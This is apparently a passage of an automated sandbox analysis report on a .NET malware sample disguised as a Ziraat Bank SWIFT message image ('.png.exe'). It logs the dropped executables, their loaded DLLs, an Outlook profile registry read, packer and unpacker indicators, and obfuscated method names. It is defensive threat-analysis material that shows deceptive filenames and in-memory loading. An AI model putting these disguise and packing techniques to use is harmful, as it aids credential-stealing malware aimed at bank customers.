Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Automated click: Continue

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Irgg.pdb source: Ziraat_Bankasi_Swift_Messaji.png.exe, BZTCUCKTKd.exe.0.dr
Source:	Binary string: _.pdb source: Native_New-Nova.exe, 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1780357181.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1780044363.00000000006C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Irgg.pdbSHA256 source: Ziraat_Bankasi_Swift_Messaji.png.exe, BZTCUCKTKd.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JGILNmq5ERBKBeTgX3.cs	.Net Code: vaU0Htm0QT System.Reflection.Assembly.Load(byte[])
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JGILNmq5ERBKBeTgX3.cs	.Net Code: vaU0Htm0QT System.Reflection.Assembly.Load(byte[])
Source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: Ziraat_Bankasi_Swift_Messaji.png.exe

Static PE information: 0xE2D84EBA [Mon Aug 7 22:05:46 2090 UTC]

Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe

9_2_004019F0

Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Static PE information: real checksum: 0x0 should be: 0xe42c7
Source: Native_snake01.exe.8.dr	Static PE information: real checksum: 0x23bfb should be: 0x38b7d
Source: BZTCUCKTKd.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xe42c7
Source: Native_New-Nova.exe.8.dr	Static PE information: real checksum: 0x23bfb should be: 0x363da

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041D659 push cs; retf	8_2_0041D65F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041DA6A push eax; ret	8_2_0041DA8A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041D905 push esi; retf	8_2_0041D906
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041E60B push esp; ret	8_2_0041E628
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041ED0C push 00000062h; iretd	8_2_0041ED10
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041EE0C push 00000062h; retf	8_2_0041EE10
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041EB1F push esp; iretd	8_2_0041EB20
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041EC1F push esp; retf	8_2_0041EC20
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041C923 push esp; iretd	8_2_0041C924
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041E087 push ebp; retf	8_2_0041E088
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041E487 push ebp; retf	8_2_0041E488
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041E58B push esp; retf	8_2_0041E5A8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041E691 push esp; iretd	8_2_0041E6A8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 8_2_0041EB9F push esp; ret	8_2_0041EBA0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0040BB97 push dword ptr [ecx-75h]; iretd	9_2_0040BBA3
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_061886FB push dword ptr [ecx+ecx-75h]; iretd	9_2_06188702
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0618378D pushad ; iretd	9_2_06183799
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_3_05D9A2A5 push es; ret	10_3_05D9A2B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_3_05D9507B push edx; iretd	10_3_05D95091
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_3_05D8FE3C push es; iretd	10_3_05D8FE58
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_3_05D8F233 push es; ret	10_3_05D8F250
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0040E21D push ecx; ret	10_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0040BB97 push dword ptr [ecx-75h]; iretd	10_2_0040BBA3
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0221E558 push eax; iretd	10_2_0221E559
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_061C3562 push esp; iretd	10_2_061C3569
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0641FE71 push es; retn 0004h	10_2_0641FE80
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06410036 push es; ret	10_2_06410038
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0680F600 push es; ret	10_2_0680F610
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0680C412 push eax; ret	10_2_0680C419
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_06808DF3 push es; ret	10_2_06808DF4

Source: Ziraat_Bankasi_Swift_Messaji.png.exe	Static PE information: section name: .text entropy: 7.869461952514959
Source: BZTCUCKTKd.exe.0.dr	Static PE information: section name: .text entropy: 7.869461952514959

Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, vkTlHhcRsw6btUGmFs.cs	High entropy of concatenated method names: 'f5stKrTkiO', 'sP6t7yLSL8', 'Db9tTa84Ea', 'AUrt1IiWRF', 'exWtqBUsOL', 'bcRTWiOPWm', 'DIXTMgmWrQ', 'CO4TLu4URq', 'XtHTdECFX0', 'a8STJ4iGl3'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, Vd0jqIxccV4ad8rCWU.cs	High entropy of concatenated method names: 'ToString', 'VLvGv14oKr', 'PjhGgdkK8Z', 'jlRG8TJkpC', 'dCNGFfPZTl', 'NuXGar4sVF', 'SEmG5knCYH', 'YimGiULn5U', 'mK1G3O73g3', 'hbLGUM0d7b'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, pCnPUPUj5MetnGJrCo.cs	High entropy of concatenated method names: 'WxU1mKGZ8l', 'Bdo1OsT5p8', 's4T1HLbTCp', 'nc91Quhf7L', 'yd31bdyTbu', 'oZJ14w15b9', 'Cy81snqT4N', 'HUH1pEMTJ7', 'Ikb1EBCb5k', 'v8J1YwcT4C'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, hn5qlPppNiRmP7sbFp.cs	High entropy of concatenated method names: 'M1h7h0GdNe', 'T1A7Ay2CBK', 'JTq7xC9TaN', 'e6V7CdghrB', 'hwo7WTHNio', 'cTp7MnuFdr', 'qFD7Lkvw6j', 'Gv77dP9KIQ', 'cQM7JMN2Z0', 'f1k7rXAVAo'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, vJaYIPzScB7GTud18C.cs	High entropy of concatenated method names: 'y8HD4MUqJ8', 'h7kDpbWeOU', 'LrdDET6aYI', 'XXLDcevArt', 'TZSDgG4vgu', 'o2GDFW4pvx', 'AjTDaSQbQv', 'nJ4D2fyeG3', 'uagDmeplgs', 'MmWDOxoqg4'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, A61HeQ99ElVWh71sEMY.cs	High entropy of concatenated method names: 's96DrnwWf4', 'aMRDzgAaNM', 'YNjn62CV3g', 'dGTn9LJ40X', 'pCFnlvTwdm', 'v2xnRy2ttH', 'AdBn0PdbJv', 'KsNnKr3tf7', 'DL6nyXAOIu', 'Lmtn7tJDeX'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, jY4MnnivfYFk4LwNnw.cs	High entropy of concatenated method names: 'feB1yOQ4Nm', 'h581S0NslA', 'QRg1tVKMmx', 'oHKtrK6MeH', 'mo0tzODQci', 'JJl16nhamf', 'NYx19Qv2O3', 'sdf1lMs18K', 'HnH1RewsFR', 'kg410nAOT4'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JGILNmq5ERBKBeTgX3.cs	High entropy of concatenated method names: 'FQnRKCweY0', 'o6mRyrW8Fe', 'gb3R7F7Fct', 'PrERSc2MJc', 'Er9RTvgvNx', 'A5PRtlgtQb', 'kPdR1vlK8g', 'zEBRq6TL3Y', 'fosRNlG2km', 'W7bRP3K2y3'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, UsPrYylU26TINSHIV2.cs	High entropy of concatenated method names: 'nkHHOsPn0', 'fXIQVDSal', 'znN4ojTcR', 'oNCsKG3CO', 'zYgEgEYLI', 'Tb7YsY21J', 'UKxcg9SCNtMLs1q43q', 'beMCOyH2swCcymiYqs', 't3uwlQPJp', 'GtUDTvqt2'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, pER9bTYhCdHL5rAotI.cs	High entropy of concatenated method names: 'fOETb1wVG2', 'L91TsERRBw', 'cH1S8tf21j', 'hSmSFU0Vk1', 'gi3SaWZLqy', 'WhjS5Ax19T', 'FeUSiRk14h', 'NTOS3xdeg2', 'UxQSUisySZ', 'cBfSuXdMww'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, ojK5W2EdhaXiJpjCYr.cs	High entropy of concatenated method names: 'MBOSQuVJP6', 'nqMS4OEViB', 'XU8Sp8uv4c', 'JLUSEhU2DC', 'cXSSVlSmfu', 'eTGSGtULII', 'xKGSehx4eC', 'OQPSwd0OPy', 'z1ZSkHDWD2', 'mqkSDUBgqR'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, JdyDhQ0RfMSkQr6PW2.cs	High entropy of concatenated method names: 'qiT91n5qlP', 'DNi9qRmP7s', 'wdh9PaXiJp', 'mCY9jrGER9', 'YAo9VtIBkT', 'cHh9GRsw6b', 'IeAyAZC2fqvqTBdEf6', 'CIprlHUBgCBow88fWJ', 'XMK99c1SrH', 'lKG9RgTbCn'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, yNhnOOJGFxk6e3GInP.cs	High entropy of concatenated method names: 'ggEkcAowc1', 'mH4kgmuIu8', 'vmak8Q5c3S', 'jbtkFAlbPw', 'TLZkag4hYr', 'wdyk51TUoX', 'Yhokiy4QnO', 'zv7k32kiA5', 'WUnkUsmTlo', 'WftkuUtLub'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, dY2LGhMvXbvyFns3MQ.cs	High entropy of concatenated method names: 'rG9edhacOG', 's4uer28ZIt', 'LAIw6VckOv', 'jeGw9Ov03J', 'PDCevA8pAP', 'VDbeoCX2UI', 'NXSefSXnBW', 'WCdeh51gcn', 'mlueAje6eR', 'EajexHHeJn'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, u0P0bd7QowMHmsWWAW.cs	High entropy of concatenated method names: 'Dispose', 'fVX9JQBNQS', 'ek1lgedA21', 'PxAdgy7qqo', 'ovE9rT8G63', 'tm59ztTEPF', 'ProcessDialogKey', 'JLOl6NhnOO', 'pFxl9k6e3G', 'onPllCiQJ5'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, emfDZb90oVCoqQoNf4Z.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XKZXkEqRDd', 'AJMXDlJsNv', 'F4eXnKcNd4', 'T2vXXedYFc', 'xlLXBknRHJ', 'b23XZHLJDZ', 'z59X2w5bqm'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, TiQJ5prpdlgEbqy6Y4.cs	High entropy of concatenated method names: 'gXqDSTbZbR', 'IwCDTk5skI', 'AKADt4vSgc', 'xFYD10OCAH', 'NS7DkTfEcL', 'mg3DqcltA5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, CwrCpGg1VN6tJneS98.cs	High entropy of concatenated method names: 'KMmb2ldmE0pN1bpQinS', 'oNsMD3dYkxXFf0bfMJc', 'IjBtwKwvbe', 'hc7tk0naqq', 'HHttDNveCE', 'yoiiAadlTChrgRPWNnx', 'g8ulgVdtExLsbTRTGrS'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, bscPwAfTBwqKqpklra.cs	High entropy of concatenated method names: 'qohIprSaH9', 'YHTIECqhcp', 'VmNIc92ag9', 'fOnIgbhMri', 'MwtIFnavod', 'kuDIaJO6OE', 'fJSIiISidt', 'oomI3YBPRm', 'JVfIug9lD1', 'ex4IvMwx2W'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, vbRJpmhwHtX87mtI44.cs	High entropy of concatenated method names: 'rQAVuLi508', 'qSPVoUp3H8', 'OxdVhEXTQV', 'y5gVAX4gvm', 'Oa2VgLDsi8', 'VJ3V8HISjZ', 'fBVVF4gov3', 'NHpVa5w117', 'RPvV5KSvg7', 'J9vVif6HYt'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, mryXXj96Mu79U8ftsLf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PxHDvcnCOW', 'jdgDoIhWbg', 'EmtDffQG3T', 'xeMDhEcJxg', 'hgQDAlJvqN', 'Le5DxLSlZb', 'DQnDCVgguR'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, Ji6lWDSU5hSVGJ1JhX.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EqIlJUOp9U', 'BIFlrxU6Bg', 'SgQlzgEbrB', 'HxmR6Py5Nf', 'trbR9u6dwj', 'otPRl3sLuJ', 'xyRRRh0pVp', 'MqB8l7xdjlW8aB2eUny'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, pxZIZVCN5JsAiqQYlw.cs	High entropy of concatenated method names: 'aCFePIVw6x', 'lCAej7u3Nb', 'ToString', 'Dkcey4t9ZX', 'hUYe7LNFWo', 'ue4eSFAZCm', 'udjeTnb7F6', 'JpxetuWu78', 'NmUe1t68Fp', 'Vfheqge2DO'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.7550000.6.raw.unpack, mowLncLktyVXQBNQSI.cs	High entropy of concatenated method names: 'CDvkVcx6aQ', 'E7Ske4a69g', 'AegkkKwZTM', 'iuiknyBeB2', 'oJLkBIN7B0', 'Qofk2N0FHn', 'Dispose', 'sECwycISjn', 'lNiw7whWIM', 'PbnwSLjMM8'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, vkTlHhcRsw6btUGmFs.cs	High entropy of concatenated method names: 'f5stKrTkiO', 'sP6t7yLSL8', 'Db9tTa84Ea', 'AUrt1IiWRF', 'exWtqBUsOL', 'bcRTWiOPWm', 'DIXTMgmWrQ', 'CO4TLu4URq', 'XtHTdECFX0', 'a8STJ4iGl3'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, Vd0jqIxccV4ad8rCWU.cs	High entropy of concatenated method names: 'ToString', 'VLvGv14oKr', 'PjhGgdkK8Z', 'jlRG8TJkpC', 'dCNGFfPZTl', 'NuXGar4sVF', 'SEmG5knCYH', 'YimGiULn5U', 'mK1G3O73g3', 'hbLGUM0d7b'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, pCnPUPUj5MetnGJrCo.cs	High entropy of concatenated method names: 'WxU1mKGZ8l', 'Bdo1OsT5p8', 's4T1HLbTCp', 'nc91Quhf7L', 'yd31bdyTbu', 'oZJ14w15b9', 'Cy81snqT4N', 'HUH1pEMTJ7', 'Ikb1EBCb5k', 'v8J1YwcT4C'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, hn5qlPppNiRmP7sbFp.cs	High entropy of concatenated method names: 'M1h7h0GdNe', 'T1A7Ay2CBK', 'JTq7xC9TaN', 'e6V7CdghrB', 'hwo7WTHNio', 'cTp7MnuFdr', 'qFD7Lkvw6j', 'Gv77dP9KIQ', 'cQM7JMN2Z0', 'f1k7rXAVAo'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, vJaYIPzScB7GTud18C.cs	High entropy of concatenated method names: 'y8HD4MUqJ8', 'h7kDpbWeOU', 'LrdDET6aYI', 'XXLDcevArt', 'TZSDgG4vgu', 'o2GDFW4pvx', 'AjTDaSQbQv', 'nJ4D2fyeG3', 'uagDmeplgs', 'MmWDOxoqg4'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, A61HeQ99ElVWh71sEMY.cs	High entropy of concatenated method names: 's96DrnwWf4', 'aMRDzgAaNM', 'YNjn62CV3g', 'dGTn9LJ40X', 'pCFnlvTwdm', 'v2xnRy2ttH', 'AdBn0PdbJv', 'KsNnKr3tf7', 'DL6nyXAOIu', 'Lmtn7tJDeX'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, jY4MnnivfYFk4LwNnw.cs	High entropy of concatenated method names: 'feB1yOQ4Nm', 'h581S0NslA', 'QRg1tVKMmx', 'oHKtrK6MeH', 'mo0tzODQci', 'JJl16nhamf', 'NYx19Qv2O3', 'sdf1lMs18K', 'HnH1RewsFR', 'kg410nAOT4'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JGILNmq5ERBKBeTgX3.cs	High entropy of concatenated method names: 'FQnRKCweY0', 'o6mRyrW8Fe', 'gb3R7F7Fct', 'PrERSc2MJc', 'Er9RTvgvNx', 'A5PRtlgtQb', 'kPdR1vlK8g', 'zEBRq6TL3Y', 'fosRNlG2km', 'W7bRP3K2y3'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, UsPrYylU26TINSHIV2.cs	High entropy of concatenated method names: 'nkHHOsPn0', 'fXIQVDSal', 'znN4ojTcR', 'oNCsKG3CO', 'zYgEgEYLI', 'Tb7YsY21J', 'UKxcg9SCNtMLs1q43q', 'beMCOyH2swCcymiYqs', 't3uwlQPJp', 'GtUDTvqt2'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, pER9bTYhCdHL5rAotI.cs	High entropy of concatenated method names: 'fOETb1wVG2', 'L91TsERRBw', 'cH1S8tf21j', 'hSmSFU0Vk1', 'gi3SaWZLqy', 'WhjS5Ax19T', 'FeUSiRk14h', 'NTOS3xdeg2', 'UxQSUisySZ', 'cBfSuXdMww'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, ojK5W2EdhaXiJpjCYr.cs	High entropy of concatenated method names: 'MBOSQuVJP6', 'nqMS4OEViB', 'XU8Sp8uv4c', 'JLUSEhU2DC', 'cXSSVlSmfu', 'eTGSGtULII', 'xKGSehx4eC', 'OQPSwd0OPy', 'z1ZSkHDWD2', 'mqkSDUBgqR'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, JdyDhQ0RfMSkQr6PW2.cs	High entropy of concatenated method names: 'qiT91n5qlP', 'DNi9qRmP7s', 'wdh9PaXiJp', 'mCY9jrGER9', 'YAo9VtIBkT', 'cHh9GRsw6b', 'IeAyAZC2fqvqTBdEf6', 'CIprlHUBgCBow88fWJ', 'XMK99c1SrH', 'lKG9RgTbCn'
